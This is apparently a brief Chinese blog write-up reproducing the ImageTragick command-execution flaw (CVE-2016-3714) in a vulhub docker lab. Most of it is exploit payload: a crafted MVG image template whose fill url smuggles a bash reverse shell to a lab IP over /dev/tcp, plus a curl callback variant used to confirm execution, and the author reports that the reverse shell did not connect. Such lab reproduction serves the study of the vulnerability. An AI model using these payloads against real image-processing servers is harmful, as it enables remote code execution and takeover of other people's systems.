[CVE-2016–3714]-Imagetragick 命令执行漏洞复现

路径:/root/vulhub/imagemagick/imagetragick
搭建:docker-compose up -d

打开地址:存在三个文件demo.php upload.php vul.jpg

vul.jpg是攻击的模板

push graphic-context
viewbox 0 0 640 480
fill 'url(https://example.com/image.jpg"|bash -i >& /dev/tcp/192.168.1.123/9999 0>&1")'
pop graphic-context

打开upload.php文件进行上传操作

[CVE-2016–3714]-Imagetragick 命令执行漏洞复现_第1张图片
发现nc确实能够接收到curl的http请求

fill 'url(https://example.com/image.jpg"|curl -v 192.168.1.123:9999")'

然后自己尝试进行反弹shell

fill 'url(https://example.com/image.jpg"|bash -i >& /dev/tcp/192.168.1.123/9999 0>&1")'

发现不成功 原因未知 如果小伙伴们知道请告知下哈

你可能感兴趣的:(漏洞利用)